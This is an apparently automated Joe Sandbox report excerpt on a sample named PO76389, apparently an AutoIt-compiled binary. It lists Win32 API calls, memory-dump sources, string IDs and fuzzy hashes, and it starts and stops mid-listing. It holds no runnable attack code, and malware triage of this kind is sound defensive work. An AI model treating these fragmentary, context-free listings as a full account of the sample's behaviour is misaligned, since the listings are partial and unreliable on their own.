                                                    • DeleteObject.GDI32(00000000), ref: 0050A7B7
                                                    • DestroyWindow.USER32 ref: 0050A7C5
                                                    • GetDesktopWindow.USER32 ref: 0050A7DF
                                                    • GetWindowRect.USER32(00000000), ref: 0050A7E6
                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0050A927
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0050A937
                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050A97F
                                                    • GetClientRect.USER32(00000000,?), ref: 0050A98B
                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0050A9C5
                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050A9E7
                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050A9FA
                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050AA05
                                                    • GlobalLock.KERNEL32(00000000), ref: 0050AA0E
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050AA1D
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0050AA26
                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050AA2D
                                                    • GlobalFree.KERNEL32(00000000), ref: 0050AA38
                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 0050AA4A
                                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0053D9BC,00000000), ref: 0050AA60
                                                    • GlobalFree.KERNEL32(00000000), ref: 0050AA70
                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0050AA96
                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0050AAB5
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050AAD7
                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050ACC4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                    • API String ID: 2211948467-2373415609
                                                    • Opcode ID: 009e351fe8698f42d1c2e9b0430603557b428c53219328f547ab14c662eb64ec
                                                    • Instruction ID: 667cc70ef0b1ab01f2f116d96bac7fbc1ee22238ee621c8ec065c052a203ee14
                                                    • Opcode Fuzzy Hash: 009e351fe8698f42d1c2e9b0430603557b428c53219328f547ab14c662eb64ec
                                                    • Instruction Fuzzy Hash: 62027B75A00218EFDB14DFA8DC89EAE7BB9FF48310F008119F915AB2A1D734AD45DB60
                                                    APIs
                                                    • SetTextColor.GDI32(?,00000000), ref: 0051D0EB
                                                    • GetSysColorBrush.USER32(0000000F), ref: 0051D11C
                                                    • GetSysColor.USER32(0000000F), ref: 0051D128
                                                    • SetBkColor.GDI32(?,000000FF), ref: 0051D142
                                                    • SelectObject.GDI32(?,00000000), ref: 0051D151
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0051D17C
                                                    • GetSysColor.USER32(00000010), ref: 0051D184
                                                    • CreateSolidBrush.GDI32(00000000), ref: 0051D18B
                                                    • FrameRect.USER32(?,?,00000000), ref: 0051D19A
                                                    • DeleteObject.GDI32(00000000), ref: 0051D1A1
                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0051D1EC
                                                    • FillRect.USER32(?,?,00000000), ref: 0051D21E
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0051D249
                                                      • Part of subcall function 0051D385: GetSysColor.USER32(00000012), ref: 0051D3BE
                                                      • Part of subcall function 0051D385: SetTextColor.GDI32(?,?), ref: 0051D3C2
                                                      • Part of subcall function 0051D385: GetSysColorBrush.USER32(0000000F), ref: 0051D3D8
                                                      • Part of subcall function 0051D385: GetSysColor.USER32(0000000F), ref: 0051D3E3
                                                      • Part of subcall function 0051D385: GetSysColor.USER32(00000011), ref: 0051D400
                                                      • Part of subcall function 0051D385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0051D40E
                                                      • Part of subcall function 0051D385: SelectObject.GDI32(?,00000000), ref: 0051D41F
                                                      • Part of subcall function 0051D385: SetBkColor.GDI32(?,00000000), ref: 0051D428
                                                      • Part of subcall function 0051D385: SelectObject.GDI32(?,?), ref: 0051D435
                                                      • Part of subcall function 0051D385: InflateRect.USER32(?,000000FF,000000FF), ref: 0051D454
                                                      • Part of subcall function 0051D385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0051D46B
                                                      • Part of subcall function 0051D385: GetWindowLongW.USER32(00000000,000000F0), ref: 0051D480
                                                      • Part of subcall function 0051D385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0051D4A8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                    • String ID:
                                                    • API String ID: 3521893082-0
                                                    • Opcode ID: 6e474d42d514b702bdd6a2a026d24bd9ef0a148f4f314d17a0a4b7fd851bb407
                                                    • Instruction ID: 389a50723e955cca1da23e3a852b1967d9c1b75851f0c083c7639572d817a11a
                                                    • Opcode Fuzzy Hash: 6e474d42d514b702bdd6a2a026d24bd9ef0a148f4f314d17a0a4b7fd851bb407
                                                    • Instruction Fuzzy Hash: F391A372408301BFDB109F64EC48E6BBBB9FF99321F100A19F962962E0D771D948DB61
                                                    APIs
                                                    • DestroyWindow.USER32(00000000), ref: 0050A42A
                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0050A4E9
                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 0050A527
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 0050A539
                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 0050A57F
                                                    • GetClientRect.USER32(00000000,?), ref: 0050A58B
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 0050A5CF
                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0050A5DE
                                                    • GetStockObject.GDI32(00000011), ref: 0050A5EE
                                                    • SelectObject.GDI32(00000000,00000000), ref: 0050A5F2
                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 0050A602
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0050A60B
                                                    • DeleteDC.GDI32(00000000), ref: 0050A614
                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0050A642
                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 0050A659
                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 0050A694
                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0050A6A8
                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 0050A6B9
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0050A6E9
                                                    • GetStockObject.GDI32(00000011), ref: 0050A6F4
                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 0050A6FF
                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 0050A709
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                    • API String ID: 2910397461-517079104
                                                    • Opcode ID: 06430b6eec49837a0b41fc7c0ac686bb44238c61abf9b9ec8a85f0c4fa52ac4c
                                                    • Instruction ID: 2c76c3185ea3b3c6a58ba32e674248ad75713783da03fb2387bf439495dd9b0a
                                                    • Opcode Fuzzy Hash: 06430b6eec49837a0b41fc7c0ac686bb44238c61abf9b9ec8a85f0c4fa52ac4c
                                                    • Instruction Fuzzy Hash: AEA1AD75A00614BFEB14DBA9DC8AFAE7BB9FB04710F004119FA14A72E0D7B4AD44DB64
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 004FE45E
                                                    • GetDriveTypeW.KERNEL32(?,0054DC88,?,\\.\,0054DBF0), ref: 004FE54B
                                                    • SetErrorMode.KERNEL32(00000000,0054DC88,?,\\.\,0054DBF0), ref: 004FE6B1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DriveType
                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                    • API String ID: 2907320926-4222207086
                                                    • Opcode ID: 425b3c0b392ca1033afb56f5ac33e9519675c43c6e286086c9f1cea0767f2d67
                                                    • Instruction ID: 63524cbcb6dcb30a50da728b048f6748c260a89a3efe9d50101f046c94401960
                                                    • Opcode Fuzzy Hash: 425b3c0b392ca1033afb56f5ac33e9519675c43c6e286086c9f1cea0767f2d67
                                                    • Instruction Fuzzy Hash: 6051A53024430DABD300DF16C89187ABBA1BFA4709B90491FF646D72B1D669DF47DA4B
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                    • API String ID: 1038674560-86951937
                                                    • Opcode ID: 4b6e5c60918930e68f4f93f3cf273821bf7af2ce1f8948eebc1ba43e7d547281
                                                    • Instruction ID: 37831aab6a089d47b5f78cdcb01e5e23c1876fa96cd8d11d30e1bb0b19fd9699
                                                    • Opcode Fuzzy Hash: 4b6e5c60918930e68f4f93f3cf273821bf7af2ce1f8948eebc1ba43e7d547281
                                                    • Instruction Fuzzy Hash: 7461F63164021277DB21BA259DD2FFA3668BF16748F14002BFD45A72C2EF9CDA01C6B9
                                                    APIs
                                                    • DestroyWindow.USER32 ref: 004B4956
                                                    • DeleteObject.GDI32(00000000), ref: 004B4998
                                                    • DeleteObject.GDI32(00000000), ref: 004B49A3
                                                    • DestroyCursor.USER32(00000000), ref: 004B49AE
                                                    • DestroyWindow.USER32(00000000), ref: 004B49B9
                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0052E179
                                                    • 6F7A0200.COMCTL32(?,000000FF,?), ref: 0052E1B2
                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0052E5E0
                                                      • Part of subcall function 004B49CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,004B4954,00000000), ref: 004B4A23
                                                    • SendMessageW.USER32 ref: 0052E627
                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0052E63E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: DestroyMessageSendWindow$DeleteObject$A0200CursorInvalidateMoveRect
                                                    • String ID: 0
                                                    • API String ID: 377055139-4108050209
                                                    • Opcode ID: b3a14bdc2f51177066946eb12f73a05376615829cebaa39fa3a73c5b03847376
                                                    • Instruction ID: cb427c885071078c00a2aa69d72df63eb6a5d19612b5154ab0d6f6e38e4ac071
                                                    • Opcode Fuzzy Hash: b3a14bdc2f51177066946eb12f73a05376615829cebaa39fa3a73c5b03847376
                                                    • Instruction Fuzzy Hash: 7E12C370200221DFDB25CF24E886BAABBF5BF56304F144569F559CB292C731EC46DBA1
                                                    APIs
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0051C598
                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0051C64E
                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 0051C669
                                                    • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0051C925
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: 0
                                                    • API String ID: 2326795674-4108050209
                                                    • Opcode ID: 0dc755507acc21daea0f0552d2bf236c4f2d272471e33da680729eeb4e47fe5e
                                                    • Instruction ID: 98ef98132f477de03a39c8de4ccdf436a1df1b2710e9ac86a2a4acb8d2b4669d
                                                    • Opcode Fuzzy Hash: 0dc755507acc21daea0f0552d2bf236c4f2d272471e33da680729eeb4e47fe5e
                                                    • Instruction Fuzzy Hash: E4F1EF71184301AFE7118F24C889BEABFF4FF49754F080A2DF599962A1C776D884DB92
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,0054DBF0), ref: 00516245
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                    • API String ID: 3964851224-45149045
                                                    • Opcode ID: 665d95513fb3ece901a7dab9aaf663ce78f3e78e8222f2f228853d8e126c4930
                                                    • Instruction ID: e26c6d12936d3ba9b979f3f809c5e07974a8a0b50f6c7d1beaa7c65fad437c05
                                                    • Opcode Fuzzy Hash: 665d95513fb3ece901a7dab9aaf663ce78f3e78e8222f2f228853d8e126c4930
                                                    • Instruction Fuzzy Hash: FFC188342042018BDB04EF15C451BAE7BD6BF94398F44486EB8425B3D6DB39DD8BCB56
                                                    APIs
                                                    • GetSysColor.USER32(00000012), ref: 0051D3BE
                                                    • SetTextColor.GDI32(?,?), ref: 0051D3C2
                                                    • GetSysColorBrush.USER32(0000000F), ref: 0051D3D8
                                                    • GetSysColor.USER32(0000000F), ref: 0051D3E3
                                                    • CreateSolidBrush.GDI32(?), ref: 0051D3E8
                                                    • GetSysColor.USER32(00000011), ref: 0051D400
                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0051D40E
                                                    • SelectObject.GDI32(?,00000000), ref: 0051D41F
                                                    • SetBkColor.GDI32(?,00000000), ref: 0051D428
                                                    • SelectObject.GDI32(?,?), ref: 0051D435
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0051D454
                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0051D46B
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0051D480
                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0051D4A8
                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0051D4CF
                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0051D4ED
                                                    • DrawFocusRect.USER32(?,?), ref: 0051D4F8
                                                    • GetSysColor.USER32(00000011), ref: 0051D506
                                                    • SetTextColor.GDI32(?,00000000), ref: 0051D50E
                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0051D522
                                                    • SelectObject.GDI32(?,0051D0B5), ref: 0051D539
                                                    • DeleteObject.GDI32(?), ref: 0051D544
                                                    • SelectObject.GDI32(?,?), ref: 0051D54A
                                                    • DeleteObject.GDI32(?), ref: 0051D54F
                                                    • SetTextColor.GDI32(?,?), ref: 0051D555
                                                    • SetBkColor.GDI32(?,?), ref: 0051D55F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                    • String ID:
                                                    • API String ID: 1996641542-0
                                                    • Opcode ID: 15ed6648582924ef19d03a591e28e306d7d79b7466a3414a37d7747bb4270155
                                                    • Instruction ID: 52dfc6dc0ed13f9c3528ca3a5f6324a9eac203098cf61045a43fdfb628572148
                                                    • Opcode Fuzzy Hash: 15ed6648582924ef19d03a591e28e306d7d79b7466a3414a37d7747bb4270155
                                                    • Instruction Fuzzy Hash: E2513D72900218AFDF109FA4EC48EEE7BB9FB18320F104515F915AB2A1D7759944DB60
                                                    APIs
                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0051B5C0
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0051B5D1
                                                    • CharNextW.USER32(0000014E), ref: 0051B600
                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0051B641
                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0051B657
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0051B668
                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0051B685
                                                    • SetWindowTextW.USER32(?,0000014E), ref: 0051B6D7
                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0051B6ED
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 0051B71E
                                                    • _memset.LIBCMT ref: 0051B743
                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0051B78C
                                                    • _memset.LIBCMT ref: 0051B7EB
                                                    • SendMessageW.USER32 ref: 0051B815
                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 0051B86D
                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 0051B91A
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0051B93C
                                                    • GetMenuItemInfoW.USER32(?), ref: 0051B986
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0051B9B3
                                                    • DrawMenuBar.USER32(?), ref: 0051B9C2
                                                    • SetWindowTextW.USER32(?,0000014E), ref: 0051B9EA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                    • String ID: 0
                                                    • API String ID: 1073566785-4108050209
                                                    • Opcode ID: 80a169727819121f3446e4630d00c319a532b5167553780272d240f4dc380073
                                                    • Instruction ID: 4bb2f065eae7e7022afd1f2783c071f5cfd9ba7d8cf2d6aaa3058c8d1bd0349f
                                                    • Opcode Fuzzy Hash: 80a169727819121f3446e4630d00c319a532b5167553780272d240f4dc380073
                                                    • Instruction Fuzzy Hash: 45E18B71900218AAFF209F51DC85EEE7FB9FF05714F10815AF929AB290DB748A84DF60
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 00517587
                                                    • GetDesktopWindow.USER32 ref: 0051759C
                                                    • GetWindowRect.USER32(00000000), ref: 005175A3
